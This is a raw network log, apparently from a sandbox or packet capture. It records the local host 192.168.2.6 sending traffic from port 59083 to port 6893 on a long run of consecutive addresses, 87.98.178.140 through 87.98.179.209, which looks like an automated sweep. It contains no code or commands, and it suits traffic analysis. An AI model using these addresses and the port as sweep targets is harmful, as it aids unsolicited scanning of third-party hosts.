Sep 29, 2022 14:50:26.809325933 CEST	59083	6893	192.168.2.6	87.98.178.140
Sep 29, 2022 14:50:26.809393883 CEST	59083	6893	192.168.2.6	87.98.178.141
Sep 29, 2022 14:50:26.809530973 CEST	59083	6893	192.168.2.6	87.98.178.142
Sep 29, 2022 14:50:26.809624910 CEST	59083	6893	192.168.2.6	87.98.178.143
Sep 29, 2022 14:50:26.809732914 CEST	59083	6893	192.168.2.6	87.98.178.144
Sep 29, 2022 14:50:26.809945107 CEST	59083	6893	192.168.2.6	87.98.178.145
Sep 29, 2022 14:50:26.810055017 CEST	59083	6893	192.168.2.6	87.98.178.146
Sep 29, 2022 14:50:26.810230017 CEST	59083	6893	192.168.2.6	87.98.178.147
Sep 29, 2022 14:50:26.810410976 CEST	59083	6893	192.168.2.6	87.98.178.148
Sep 29, 2022 14:50:26.810554028 CEST	59083	6893	192.168.2.6	87.98.178.149
Sep 29, 2022 14:50:26.810621023 CEST	59083	6893	192.168.2.6	87.98.178.150
Sep 29, 2022 14:50:26.810715914 CEST	59083	6893	192.168.2.6	87.98.178.151
Sep 29, 2022 14:50:26.810920000 CEST	59083	6893	192.168.2.6	87.98.178.152
Sep 29, 2022 14:50:26.811086893 CEST	59083	6893	192.168.2.6	87.98.178.153
Sep 29, 2022 14:50:26.811306953 CEST	59083	6893	192.168.2.6	87.98.178.154
Sep 29, 2022 14:50:26.811343908 CEST	59083	6893	192.168.2.6	87.98.178.155
Sep 29, 2022 14:50:26.811362028 CEST	59083	6893	192.168.2.6	87.98.178.156
Sep 29, 2022 14:50:26.811558008 CEST	59083	6893	192.168.2.6	87.98.178.157
Sep 29, 2022 14:50:26.811567068 CEST	59083	6893	192.168.2.6	87.98.178.158
Sep 29, 2022 14:50:26.811669111 CEST	59083	6893	192.168.2.6	87.98.178.159
Sep 29, 2022 14:50:26.811798096 CEST	59083	6893	192.168.2.6	87.98.178.160
Sep 29, 2022 14:50:26.811887980 CEST	59083	6893	192.168.2.6	87.98.178.161
Sep 29, 2022 14:50:26.812066078 CEST	59083	6893	192.168.2.6	87.98.178.162
Sep 29, 2022 14:50:26.812201023 CEST	59083	6893	192.168.2.6	87.98.178.163
Sep 29, 2022 14:50:26.812360048 CEST	59083	6893	192.168.2.6	87.98.178.164
Sep 29, 2022 14:50:26.812469959 CEST	59083	6893	192.168.2.6	87.98.178.165
Sep 29, 2022 14:50:26.812575102 CEST	59083	6893	192.168.2.6	87.98.178.166
Sep 29, 2022 14:50:26.812649965 CEST	59083	6893	192.168.2.6	87.98.178.167
Sep 29, 2022 14:50:26.827531099 CEST	59083	6893	192.168.2.6	87.98.178.168
Sep 29, 2022 14:50:26.827697992 CEST	59083	6893	192.168.2.6	87.98.178.169
Sep 29, 2022 14:50:26.827908039 CEST	59083	6893	192.168.2.6	87.98.178.170
Sep 29, 2022 14:50:26.828072071 CEST	59083	6893	192.168.2.6	87.98.178.171
Sep 29, 2022 14:50:26.828121901 CEST	59083	6893	192.168.2.6	87.98.178.172
Sep 29, 2022 14:50:26.828358889 CEST	59083	6893	192.168.2.6	87.98.178.173
Sep 29, 2022 14:50:26.828377008 CEST	59083	6893	192.168.2.6	87.98.178.174
Sep 29, 2022 14:50:26.828560114 CEST	59083	6893	192.168.2.6	87.98.178.175
Sep 29, 2022 14:50:26.828622103 CEST	59083	6893	192.168.2.6	87.98.178.176
Sep 29, 2022 14:50:26.828651905 CEST	59083	6893	192.168.2.6	87.98.178.177
Sep 29, 2022 14:50:26.828738928 CEST	59083	6893	192.168.2.6	87.98.178.178
Sep 29, 2022 14:50:26.828870058 CEST	59083	6893	192.168.2.6	87.98.178.179
Sep 29, 2022 14:50:26.828991890 CEST	59083	6893	192.168.2.6	87.98.178.180
Sep 29, 2022 14:50:26.829128981 CEST	59083	6893	192.168.2.6	87.98.178.181
Sep 29, 2022 14:50:26.829135895 CEST	59083	6893	192.168.2.6	87.98.178.182
Sep 29, 2022 14:50:26.829272032 CEST	59083	6893	192.168.2.6	87.98.178.183
Sep 29, 2022 14:50:26.829412937 CEST	59083	6893	192.168.2.6	87.98.178.184
Sep 29, 2022 14:50:26.829442978 CEST	59083	6893	192.168.2.6	87.98.178.185
Sep 29, 2022 14:50:26.829607010 CEST	59083	6893	192.168.2.6	87.98.178.186
Sep 29, 2022 14:50:26.829679966 CEST	59083	6893	192.168.2.6	87.98.178.187
Sep 29, 2022 14:50:26.829771042 CEST	59083	6893	192.168.2.6	87.98.178.188
Sep 29, 2022 14:50:26.829875946 CEST	59083	6893	192.168.2.6	87.98.178.189
Sep 29, 2022 14:50:26.829986095 CEST	59083	6893	192.168.2.6	87.98.178.190
Sep 29, 2022 14:50:26.830084085 CEST	59083	6893	192.168.2.6	87.98.178.191
Sep 29, 2022 14:50:26.830180883 CEST	59083	6893	192.168.2.6	87.98.178.192
Sep 29, 2022 14:50:26.830317020 CEST	59083	6893	192.168.2.6	87.98.178.193
Sep 29, 2022 14:50:26.830537081 CEST	59083	6893	192.168.2.6	87.98.178.194
Sep 29, 2022 14:50:26.830845118 CEST	59083	6893	192.168.2.6	87.98.178.195
Sep 29, 2022 14:50:26.830976963 CEST	59083	6893	192.168.2.6	87.98.178.196
Sep 29, 2022 14:50:26.831167936 CEST	59083	6893	192.168.2.6	87.98.178.197
Sep 29, 2022 14:50:26.831331968 CEST	59083	6893	192.168.2.6	87.98.178.198
Sep 29, 2022 14:50:26.831604004 CEST	59083	6893	192.168.2.6	87.98.178.199
Sep 29, 2022 14:50:26.833369017 CEST	59083	6893	192.168.2.6	87.98.178.200
Sep 29, 2022 14:50:26.833580971 CEST	59083	6893	192.168.2.6	87.98.178.201
Sep 29, 2022 14:50:26.833709002 CEST	59083	6893	192.168.2.6	87.98.178.202
Sep 29, 2022 14:50:26.833843946 CEST	59083	6893	192.168.2.6	87.98.178.203
Sep 29, 2022 14:50:26.834017992 CEST	59083	6893	192.168.2.6	87.98.178.204
Sep 29, 2022 14:50:26.834136009 CEST	59083	6893	192.168.2.6	87.98.178.205
Sep 29, 2022 14:50:26.834259033 CEST	59083	6893	192.168.2.6	87.98.178.206
Sep 29, 2022 14:50:26.834337950 CEST	59083	6893	192.168.2.6	87.98.178.207
Sep 29, 2022 14:50:26.834460974 CEST	59083	6893	192.168.2.6	87.98.178.208
Sep 29, 2022 14:50:26.834551096 CEST	59083	6893	192.168.2.6	87.98.178.209
Sep 29, 2022 14:50:26.834666014 CEST	59083	6893	192.168.2.6	87.98.178.210
Sep 29, 2022 14:50:26.834860086 CEST	59083	6893	192.168.2.6	87.98.178.211
Sep 29, 2022 14:50:26.835052967 CEST	59083	6893	192.168.2.6	87.98.178.212
Sep 29, 2022 14:50:26.835128069 CEST	59083	6893	192.168.2.6	87.98.178.213
Sep 29, 2022 14:50:26.835238934 CEST	59083	6893	192.168.2.6	87.98.178.214
Sep 29, 2022 14:50:26.835362911 CEST	59083	6893	192.168.2.6	87.98.178.215
Sep 29, 2022 14:50:26.835458994 CEST	59083	6893	192.168.2.6	87.98.178.216
Sep 29, 2022 14:50:26.835556984 CEST	59083	6893	192.168.2.6	87.98.178.217
Sep 29, 2022 14:50:26.835733891 CEST	59083	6893	192.168.2.6	87.98.178.218
Sep 29, 2022 14:50:26.835886002 CEST	59083	6893	192.168.2.6	87.98.178.219
Sep 29, 2022 14:50:26.836018085 CEST	59083	6893	192.168.2.6	87.98.178.220
Sep 29, 2022 14:50:26.836126089 CEST	59083	6893	192.168.2.6	87.98.178.221
Sep 29, 2022 14:50:26.836242914 CEST	59083	6893	192.168.2.6	87.98.178.222
Sep 29, 2022 14:50:26.836359024 CEST	59083	6893	192.168.2.6	87.98.178.223
Sep 29, 2022 14:50:26.836437941 CEST	59083	6893	192.168.2.6	87.98.178.224
Sep 29, 2022 14:50:26.836560011 CEST	59083	6893	192.168.2.6	87.98.178.225
Sep 29, 2022 14:50:26.836729050 CEST	59083	6893	192.168.2.6	87.98.178.226
Sep 29, 2022 14:50:26.836827993 CEST	59083	6893	192.168.2.6	87.98.178.227
Sep 29, 2022 14:50:26.836944103 CEST	59083	6893	192.168.2.6	87.98.178.228
Sep 29, 2022 14:50:26.837090015 CEST	59083	6893	192.168.2.6	87.98.178.229
Sep 29, 2022 14:50:26.837197065 CEST	59083	6893	192.168.2.6	87.98.178.230
Sep 29, 2022 14:50:26.837291956 CEST	59083	6893	192.168.2.6	87.98.178.231
Sep 29, 2022 14:50:26.837383032 CEST	59083	6893	192.168.2.6	87.98.178.232
Sep 29, 2022 14:50:26.837470055 CEST	59083	6893	192.168.2.6	87.98.178.233
Sep 29, 2022 14:50:26.839855909 CEST	59083	6893	192.168.2.6	87.98.178.234
Sep 29, 2022 14:50:26.839971066 CEST	59083	6893	192.168.2.6	87.98.178.235
Sep 29, 2022 14:50:26.840203047 CEST	59083	6893	192.168.2.6	87.98.178.236
Sep 29, 2022 14:50:26.840396881 CEST	59083	6893	192.168.2.6	87.98.178.237
Sep 29, 2022 14:50:26.840547085 CEST	59083	6893	192.168.2.6	87.98.178.238
Sep 29, 2022 14:50:26.840632915 CEST	59083	6893	192.168.2.6	87.98.178.239
Sep 29, 2022 14:50:26.841602087 CEST	59083	6893	192.168.2.6	87.98.178.240
Sep 29, 2022 14:50:26.841614962 CEST	59083	6893	192.168.2.6	87.98.178.241
Sep 29, 2022 14:50:26.841763020 CEST	59083	6893	192.168.2.6	87.98.178.242
Sep 29, 2022 14:50:26.841871023 CEST	59083	6893	192.168.2.6	87.98.178.243
Sep 29, 2022 14:50:26.841999054 CEST	59083	6893	192.168.2.6	87.98.178.244
Sep 29, 2022 14:50:26.842094898 CEST	59083	6893	192.168.2.6	87.98.178.245
Sep 29, 2022 14:50:26.842195988 CEST	59083	6893	192.168.2.6	87.98.178.246
Sep 29, 2022 14:50:26.842273951 CEST	59083	6893	192.168.2.6	87.98.178.247
Sep 29, 2022 14:50:26.842377901 CEST	59083	6893	192.168.2.6	87.98.178.248
Sep 29, 2022 14:50:26.842478037 CEST	59083	6893	192.168.2.6	87.98.178.249
Sep 29, 2022 14:50:26.842597961 CEST	59083	6893	192.168.2.6	87.98.178.250
Sep 29, 2022 14:50:26.842773914 CEST	59083	6893	192.168.2.6	87.98.178.251
Sep 29, 2022 14:50:26.843383074 CEST	59083	6893	192.168.2.6	87.98.178.252
Sep 29, 2022 14:50:26.843991041 CEST	59083	6893	192.168.2.6	87.98.178.253
Sep 29, 2022 14:50:26.844106913 CEST	59083	6893	192.168.2.6	87.98.178.254
Sep 29, 2022 14:50:27.878115892 CEST	59083	6893	192.168.2.6	87.98.178.255
Sep 29, 2022 14:50:27.878222942 CEST	59083	6893	192.168.2.6	87.98.179.0
Sep 29, 2022 14:50:27.878326893 CEST	59083	6893	192.168.2.6	87.98.179.1
Sep 29, 2022 14:50:27.878441095 CEST	59083	6893	192.168.2.6	87.98.179.2
Sep 29, 2022 14:50:27.878511906 CEST	59083	6893	192.168.2.6	87.98.179.3
Sep 29, 2022 14:50:27.878619909 CEST	59083	6893	192.168.2.6	87.98.179.4
Sep 29, 2022 14:50:27.881094933 CEST	59083	6893	192.168.2.6	87.98.179.5
Sep 29, 2022 14:50:27.881347895 CEST	59083	6893	192.168.2.6	87.98.179.6
Sep 29, 2022 14:50:27.881505966 CEST	59083	6893	192.168.2.6	87.98.179.7
Sep 29, 2022 14:50:27.881715059 CEST	59083	6893	192.168.2.6	87.98.179.8
Sep 29, 2022 14:50:27.881812096 CEST	59083	6893	192.168.2.6	87.98.179.9
Sep 29, 2022 14:50:27.881911993 CEST	59083	6893	192.168.2.6	87.98.179.10
Sep 29, 2022 14:50:27.896725893 CEST	59083	6893	192.168.2.6	87.98.179.11
Sep 29, 2022 14:50:27.896884918 CEST	59083	6893	192.168.2.6	87.98.179.12
Sep 29, 2022 14:50:27.897001982 CEST	59083	6893	192.168.2.6	87.98.179.13
Sep 29, 2022 14:50:27.897180080 CEST	59083	6893	192.168.2.6	87.98.179.14
Sep 29, 2022 14:50:27.897254944 CEST	59083	6893	192.168.2.6	87.98.179.15
Sep 29, 2022 14:50:27.897509098 CEST	59083	6893	192.168.2.6	87.98.179.16
Sep 29, 2022 14:50:27.897759914 CEST	59083	6893	192.168.2.6	87.98.179.17
Sep 29, 2022 14:50:27.897846937 CEST	59083	6893	192.168.2.6	87.98.179.18
Sep 29, 2022 14:50:27.898020983 CEST	59083	6893	192.168.2.6	87.98.179.19
Sep 29, 2022 14:50:27.899324894 CEST	59083	6893	192.168.2.6	87.98.179.20
Sep 29, 2022 14:50:27.899506092 CEST	59083	6893	192.168.2.6	87.98.179.21
Sep 29, 2022 14:50:27.899663925 CEST	59083	6893	192.168.2.6	87.98.179.22
Sep 29, 2022 14:50:27.899821043 CEST	59083	6893	192.168.2.6	87.98.179.23
Sep 29, 2022 14:50:27.899923086 CEST	59083	6893	192.168.2.6	87.98.179.24
Sep 29, 2022 14:50:27.900051117 CEST	59083	6893	192.168.2.6	87.98.179.25
Sep 29, 2022 14:50:27.900187969 CEST	59083	6893	192.168.2.6	87.98.179.26
Sep 29, 2022 14:50:27.900357962 CEST	59083	6893	192.168.2.6	87.98.179.27
Sep 29, 2022 14:50:27.900501013 CEST	59083	6893	192.168.2.6	87.98.179.28
Sep 29, 2022 14:50:27.900651932 CEST	59083	6893	192.168.2.6	87.98.179.29
Sep 29, 2022 14:50:27.900886059 CEST	59083	6893	192.168.2.6	87.98.179.31
Sep 29, 2022 14:50:27.900918961 CEST	59083	6893	192.168.2.6	87.98.179.30
Sep 29, 2022 14:50:27.901026011 CEST	59083	6893	192.168.2.6	87.98.179.32
Sep 29, 2022 14:50:27.901158094 CEST	59083	6893	192.168.2.6	87.98.179.33
Sep 29, 2022 14:50:27.901345968 CEST	59083	6893	192.168.2.6	87.98.179.34
Sep 29, 2022 14:50:27.901468992 CEST	59083	6893	192.168.2.6	87.98.179.35
Sep 29, 2022 14:50:27.901602030 CEST	59083	6893	192.168.2.6	87.98.179.36
Sep 29, 2022 14:50:27.901721001 CEST	59083	6893	192.168.2.6	87.98.179.37
Sep 29, 2022 14:50:27.901859045 CEST	59083	6893	192.168.2.6	87.98.179.38
Sep 29, 2022 14:50:27.901978016 CEST	59083	6893	192.168.2.6	87.98.179.39
Sep 29, 2022 14:50:27.902087927 CEST	59083	6893	192.168.2.6	87.98.179.40
Sep 29, 2022 14:50:27.902266979 CEST	59083	6893	192.168.2.6	87.98.179.41
Sep 29, 2022 14:50:27.902383089 CEST	59083	6893	192.168.2.6	87.98.179.42
Sep 29, 2022 14:50:27.902513981 CEST	59083	6893	192.168.2.6	87.98.179.43
Sep 29, 2022 14:50:27.902642965 CEST	59083	6893	192.168.2.6	87.98.179.44
Sep 29, 2022 14:50:27.902762890 CEST	59083	6893	192.168.2.6	87.98.179.45
Sep 29, 2022 14:50:27.902878046 CEST	59083	6893	192.168.2.6	87.98.179.46
Sep 29, 2022 14:50:27.903048992 CEST	59083	6893	192.168.2.6	87.98.179.47
Sep 29, 2022 14:50:27.903115988 CEST	59083	6893	192.168.2.6	87.98.179.48
Sep 29, 2022 14:50:27.903275013 CEST	59083	6893	192.168.2.6	87.98.179.49
Sep 29, 2022 14:50:27.903393030 CEST	59083	6893	192.168.2.6	87.98.179.50
Sep 29, 2022 14:50:27.903575897 CEST	59083	6893	192.168.2.6	87.98.179.51
Sep 29, 2022 14:50:27.903718948 CEST	59083	6893	192.168.2.6	87.98.179.52
Sep 29, 2022 14:50:27.903851032 CEST	59083	6893	192.168.2.6	87.98.179.53
Sep 29, 2022 14:50:27.903964996 CEST	59083	6893	192.168.2.6	87.98.179.54
Sep 29, 2022 14:50:27.904088020 CEST	59083	6893	192.168.2.6	87.98.179.55
Sep 29, 2022 14:50:27.904222965 CEST	59083	6893	192.168.2.6	87.98.179.56
Sep 29, 2022 14:50:27.904392958 CEST	59083	6893	192.168.2.6	87.98.179.57
Sep 29, 2022 14:50:27.904598951 CEST	59083	6893	192.168.2.6	87.98.179.58
Sep 29, 2022 14:50:27.904723883 CEST	59083	6893	192.168.2.6	87.98.179.59
Sep 29, 2022 14:50:27.904865026 CEST	59083	6893	192.168.2.6	87.98.179.60
Sep 29, 2022 14:50:27.904982090 CEST	59083	6893	192.168.2.6	87.98.179.61
Sep 29, 2022 14:50:27.905148983 CEST	59083	6893	192.168.2.6	87.98.179.62
Sep 29, 2022 14:50:27.905292988 CEST	59083	6893	192.168.2.6	87.98.179.63
Sep 29, 2022 14:50:27.905473948 CEST	59083	6893	192.168.2.6	87.98.179.64
Sep 29, 2022 14:50:27.916073084 CEST	59083	6893	192.168.2.6	87.98.179.65
Sep 29, 2022 14:50:27.916400909 CEST	59083	6893	192.168.2.6	87.98.179.66
Sep 29, 2022 14:50:27.916625977 CEST	59083	6893	192.168.2.6	87.98.179.67
Sep 29, 2022 14:50:27.916802883 CEST	59083	6893	192.168.2.6	87.98.179.68
Sep 29, 2022 14:50:27.916927099 CEST	59083	6893	192.168.2.6	87.98.179.69
Sep 29, 2022 14:50:27.917066097 CEST	59083	6893	192.168.2.6	87.98.179.70
Sep 29, 2022 14:50:27.917258024 CEST	59083	6893	192.168.2.6	87.98.179.71
Sep 29, 2022 14:50:27.918625116 CEST	59083	6893	192.168.2.6	87.98.179.72
Sep 29, 2022 14:50:27.918767929 CEST	59083	6893	192.168.2.6	87.98.179.73
Sep 29, 2022 14:50:27.918901920 CEST	59083	6893	192.168.2.6	87.98.179.74
Sep 29, 2022 14:50:27.919066906 CEST	59083	6893	192.168.2.6	87.98.179.75
Sep 29, 2022 14:50:27.919195890 CEST	59083	6893	192.168.2.6	87.98.179.76
Sep 29, 2022 14:50:27.919348001 CEST	59083	6893	192.168.2.6	87.98.179.77
Sep 29, 2022 14:50:27.919461966 CEST	59083	6893	192.168.2.6	87.98.179.78
Sep 29, 2022 14:50:27.919558048 CEST	59083	6893	192.168.2.6	87.98.179.79
Sep 29, 2022 14:50:27.919755936 CEST	59083	6893	192.168.2.6	87.98.179.80
Sep 29, 2022 14:50:27.919910908 CEST	59083	6893	192.168.2.6	87.98.179.81
Sep 29, 2022 14:50:27.920023918 CEST	59083	6893	192.168.2.6	87.98.179.82
Sep 29, 2022 14:50:27.920170069 CEST	59083	6893	192.168.2.6	87.98.179.83
Sep 29, 2022 14:50:27.920347929 CEST	59083	6893	192.168.2.6	87.98.179.84
Sep 29, 2022 14:50:27.920463085 CEST	59083	6893	192.168.2.6	87.98.179.85
Sep 29, 2022 14:50:27.920602083 CEST	59083	6893	192.168.2.6	87.98.179.86
Sep 29, 2022 14:50:27.920739889 CEST	59083	6893	192.168.2.6	87.98.179.87
Sep 29, 2022 14:50:27.920870066 CEST	59083	6893	192.168.2.6	87.98.179.88
Sep 29, 2022 14:50:27.920999050 CEST	59083	6893	192.168.2.6	87.98.179.89
Sep 29, 2022 14:50:27.921334028 CEST	59083	6893	192.168.2.6	87.98.179.90
Sep 29, 2022 14:50:27.921493053 CEST	59083	6893	192.168.2.6	87.98.179.91
Sep 29, 2022 14:50:27.921626091 CEST	59083	6893	192.168.2.6	87.98.179.92
Sep 29, 2022 14:50:27.921761990 CEST	59083	6893	192.168.2.6	87.98.179.93
Sep 29, 2022 14:50:27.922024965 CEST	59083	6893	192.168.2.6	87.98.179.94
Sep 29, 2022 14:50:27.922027111 CEST	59083	6893	192.168.2.6	87.98.179.95
Sep 29, 2022 14:50:27.922151089 CEST	59083	6893	192.168.2.6	87.98.179.96
Sep 29, 2022 14:50:27.922291040 CEST	59083	6893	192.168.2.6	87.98.179.97
Sep 29, 2022 14:50:27.922491074 CEST	59083	6893	192.168.2.6	87.98.179.98
Sep 29, 2022 14:50:27.922549963 CEST	59083	6893	192.168.2.6	87.98.179.99
Sep 29, 2022 14:50:27.922652006 CEST	59083	6893	192.168.2.6	87.98.179.100
Sep 29, 2022 14:50:27.922746897 CEST	59083	6893	192.168.2.6	87.98.179.101
Sep 29, 2022 14:50:27.922861099 CEST	59083	6893	192.168.2.6	87.98.179.102
Sep 29, 2022 14:50:27.922929049 CEST	59083	6893	192.168.2.6	87.98.179.103
Sep 29, 2022 14:50:27.923151970 CEST	59083	6893	192.168.2.6	87.98.179.104
Sep 29, 2022 14:50:27.923294067 CEST	59083	6893	192.168.2.6	87.98.179.105
Sep 29, 2022 14:50:27.923485041 CEST	59083	6893	192.168.2.6	87.98.179.106
Sep 29, 2022 14:50:27.923952103 CEST	59083	6893	192.168.2.6	87.98.179.107
Sep 29, 2022 14:50:27.924108028 CEST	59083	6893	192.168.2.6	87.98.179.108
Sep 29, 2022 14:50:27.924252987 CEST	59083	6893	192.168.2.6	87.98.179.109
Sep 29, 2022 14:50:27.924422026 CEST	59083	6893	192.168.2.6	87.98.179.110
Sep 29, 2022 14:50:27.924596071 CEST	59083	6893	192.168.2.6	87.98.179.111
Sep 29, 2022 14:50:27.924650908 CEST	59083	6893	192.168.2.6	87.98.179.112
Sep 29, 2022 14:50:27.924804926 CEST	59083	6893	192.168.2.6	87.98.179.113
Sep 29, 2022 14:50:27.924890041 CEST	59083	6893	192.168.2.6	87.98.179.114
Sep 29, 2022 14:50:27.925003052 CEST	59083	6893	192.168.2.6	87.98.179.115
Sep 29, 2022 14:50:27.925174952 CEST	59083	6893	192.168.2.6	87.98.179.116
Sep 29, 2022 14:50:27.925223112 CEST	59083	6893	192.168.2.6	87.98.179.117
Sep 29, 2022 14:50:27.925333977 CEST	59083	6893	192.168.2.6	87.98.179.118
Sep 29, 2022 14:50:27.925417900 CEST	59083	6893	192.168.2.6	87.98.179.119
Sep 29, 2022 14:50:27.930246115 CEST	59083	6893	192.168.2.6	87.98.179.120
Sep 29, 2022 14:50:27.930356026 CEST	59083	6893	192.168.2.6	87.98.179.121
Sep 29, 2022 14:50:27.930495977 CEST	59083	6893	192.168.2.6	87.98.179.122
Sep 29, 2022 14:50:27.930588961 CEST	59083	6893	192.168.2.6	87.98.179.123
Sep 29, 2022 14:50:27.930715084 CEST	59083	6893	192.168.2.6	87.98.179.124
Sep 29, 2022 14:50:27.930778027 CEST	59083	6893	192.168.2.6	87.98.179.125
Sep 29, 2022 14:50:27.930896997 CEST	59083	6893	192.168.2.6	87.98.179.126
Sep 29, 2022 14:50:27.931000948 CEST	59083	6893	192.168.2.6	87.98.179.127
Sep 29, 2022 14:50:27.931190968 CEST	59083	6893	192.168.2.6	87.98.179.128
Sep 29, 2022 14:50:27.933412075 CEST	59083	6893	192.168.2.6	87.98.179.129
Sep 29, 2022 14:50:27.933598995 CEST	59083	6893	192.168.2.6	87.98.179.130
Sep 29, 2022 14:50:27.933753014 CEST	59083	6893	192.168.2.6	87.98.179.131
Sep 29, 2022 14:50:27.933865070 CEST	59083	6893	192.168.2.6	87.98.179.132
Sep 29, 2022 14:50:27.933964968 CEST	59083	6893	192.168.2.6	87.98.179.133
Sep 29, 2022 14:50:27.934079885 CEST	59083	6893	192.168.2.6	87.98.179.134
Sep 29, 2022 14:50:27.934191942 CEST	59083	6893	192.168.2.6	87.98.179.135
Sep 29, 2022 14:50:27.934335947 CEST	59083	6893	192.168.2.6	87.98.179.136
Sep 29, 2022 14:50:27.934437037 CEST	59083	6893	192.168.2.6	87.98.179.137
Sep 29, 2022 14:50:27.990494967 CEST	59083	6893	192.168.2.6	87.98.179.138
Sep 29, 2022 14:50:27.990789890 CEST	59083	6893	192.168.2.6	87.98.179.140
Sep 29, 2022 14:50:27.990791082 CEST	59083	6893	192.168.2.6	87.98.179.139
Sep 29, 2022 14:50:27.990895987 CEST	59083	6893	192.168.2.6	87.98.179.141
Sep 29, 2022 14:50:27.991099119 CEST	59083	6893	192.168.2.6	87.98.179.142
Sep 29, 2022 14:50:27.991247892 CEST	59083	6893	192.168.2.6	87.98.179.143
Sep 29, 2022 14:50:27.991336107 CEST	59083	6893	192.168.2.6	87.98.179.144
Sep 29, 2022 14:50:27.991441011 CEST	59083	6893	192.168.2.6	87.98.179.145
Sep 29, 2022 14:50:27.991534948 CEST	59083	6893	192.168.2.6	87.98.179.146
Sep 29, 2022 14:50:27.991660118 CEST	59083	6893	192.168.2.6	87.98.179.147
Sep 29, 2022 14:50:27.991731882 CEST	59083	6893	192.168.2.6	87.98.179.148
Sep 29, 2022 14:50:27.991941929 CEST	59083	6893	192.168.2.6	87.98.179.149
Sep 29, 2022 14:50:27.992038965 CEST	59083	6893	192.168.2.6	87.98.179.150
Sep 29, 2022 14:50:27.992170095 CEST	59083	6893	192.168.2.6	87.98.179.151
Sep 29, 2022 14:50:27.992233992 CEST	59083	6893	192.168.2.6	87.98.179.152
Sep 29, 2022 14:50:27.992326975 CEST	59083	6893	192.168.2.6	87.98.179.153
Sep 29, 2022 14:50:27.992409945 CEST	59083	6893	192.168.2.6	87.98.179.154
Sep 29, 2022 14:50:27.992506027 CEST	59083	6893	192.168.2.6	87.98.179.155
Sep 29, 2022 14:50:27.992686987 CEST	59083	6893	192.168.2.6	87.98.179.157
Sep 29, 2022 14:50:27.992697001 CEST	59083	6893	192.168.2.6	87.98.179.156
Sep 29, 2022 14:50:27.992774963 CEST	59083	6893	192.168.2.6	87.98.179.158
Sep 29, 2022 14:50:27.992949963 CEST	59083	6893	192.168.2.6	87.98.179.159
Sep 29, 2022 14:50:27.993063927 CEST	59083	6893	192.168.2.6	87.98.179.160
Sep 29, 2022 14:50:27.993160009 CEST	59083	6893	192.168.2.6	87.98.179.161
Sep 29, 2022 14:50:27.993367910 CEST	59083	6893	192.168.2.6	87.98.179.163
Sep 29, 2022 14:50:27.993418932 CEST	59083	6893	192.168.2.6	87.98.179.162
Sep 29, 2022 14:50:27.993496895 CEST	59083	6893	192.168.2.6	87.98.179.164
Sep 29, 2022 14:50:27.993593931 CEST	59083	6893	192.168.2.6	87.98.179.165
Sep 29, 2022 14:50:27.993691921 CEST	59083	6893	192.168.2.6	87.98.179.166
Sep 29, 2022 14:50:27.993779898 CEST	59083	6893	192.168.2.6	87.98.179.167
Sep 29, 2022 14:50:27.993887901 CEST	59083	6893	192.168.2.6	87.98.179.168
Sep 29, 2022 14:50:27.994031906 CEST	59083	6893	192.168.2.6	87.98.179.169
Sep 29, 2022 14:50:27.994071960 CEST	59083	6893	192.168.2.6	87.98.179.170
Sep 29, 2022 14:50:27.994242907 CEST	59083	6893	192.168.2.6	87.98.179.171
Sep 29, 2022 14:50:27.994360924 CEST	59083	6893	192.168.2.6	87.98.179.172
Sep 29, 2022 14:50:27.994436026 CEST	59083	6893	192.168.2.6	87.98.179.173
Sep 29, 2022 14:50:27.994544983 CEST	59083	6893	192.168.2.6	87.98.179.174
Sep 29, 2022 14:50:27.994652033 CEST	59083	6893	192.168.2.6	87.98.179.175
Sep 29, 2022 14:50:27.994837046 CEST	59083	6893	192.168.2.6	87.98.179.176
Sep 29, 2022 14:50:27.994838953 CEST	59083	6893	192.168.2.6	87.98.179.177
Sep 29, 2022 14:50:27.994950056 CEST	59083	6893	192.168.2.6	87.98.179.178
Sep 29, 2022 14:50:27.995116949 CEST	59083	6893	192.168.2.6	87.98.179.180
Sep 29, 2022 14:50:27.995140076 CEST	59083	6893	192.168.2.6	87.98.179.179
Sep 29, 2022 14:50:27.995235920 CEST	59083	6893	192.168.2.6	87.98.179.181
Sep 29, 2022 14:50:27.995316982 CEST	59083	6893	192.168.2.6	87.98.179.182
Sep 29, 2022 14:50:27.995399952 CEST	59083	6893	192.168.2.6	87.98.179.183
Sep 29, 2022 14:50:27.995481968 CEST	59083	6893	192.168.2.6	87.98.179.184
Sep 29, 2022 14:50:27.995660067 CEST	59083	6893	192.168.2.6	87.98.179.185
Sep 29, 2022 14:50:27.996808052 CEST	59083	6893	192.168.2.6	87.98.179.186
Sep 29, 2022 14:50:27.996942997 CEST	59083	6893	192.168.2.6	87.98.179.187
Sep 29, 2022 14:50:27.997056961 CEST	59083	6893	192.168.2.6	87.98.179.188
Sep 29, 2022 14:50:27.997148037 CEST	59083	6893	192.168.2.6	87.98.179.189
Sep 29, 2022 14:50:27.997277975 CEST	59083	6893	192.168.2.6	87.98.179.190
Sep 29, 2022 14:50:27.997344971 CEST	59083	6893	192.168.2.6	87.98.179.191
Sep 29, 2022 14:50:27.997423887 CEST	59083	6893	192.168.2.6	87.98.179.192
Sep 29, 2022 14:50:27.997590065 CEST	59083	6893	192.168.2.6	87.98.179.193
Sep 29, 2022 14:50:27.997706890 CEST	59083	6893	192.168.2.6	87.98.179.194
Sep 29, 2022 14:50:27.997751951 CEST	59083	6893	192.168.2.6	87.98.179.195
Sep 29, 2022 14:50:27.997939110 CEST	59083	6893	192.168.2.6	87.98.179.196
Sep 29, 2022 14:50:27.998089075 CEST	59083	6893	192.168.2.6	87.98.179.197
Sep 29, 2022 14:50:27.998184919 CEST	59083	6893	192.168.2.6	87.98.179.198
Sep 29, 2022 14:50:27.998291016 CEST	59083	6893	192.168.2.6	87.98.179.199
Sep 29, 2022 14:50:27.998372078 CEST	59083	6893	192.168.2.6	87.98.179.200
Sep 29, 2022 14:50:27.998456955 CEST	59083	6893	192.168.2.6	87.98.179.201
Sep 29, 2022 14:50:27.998569965 CEST	59083	6893	192.168.2.6	87.98.179.202
Sep 29, 2022 14:50:27.998729944 CEST	59083	6893	192.168.2.6	87.98.179.203
Sep 29, 2022 14:50:27.998820066 CEST	59083	6893	192.168.2.6	87.98.179.204
Sep 29, 2022 14:50:27.999013901 CEST	59083	6893	192.168.2.6	87.98.179.205
Sep 29, 2022 14:50:27.999097109 CEST	59083	6893	192.168.2.6	87.98.179.206
Sep 29, 2022 14:50:27.999191046 CEST	59083	6893	192.168.2.6	87.98.179.207
Sep 29, 2022 14:50:27.999269962 CEST	59083	6893	192.168.2.6	87.98.179.208
Sep 29, 2022 14:50:27.999376059 CEST	59083	6893	192.168.2.6	87.98.179.209
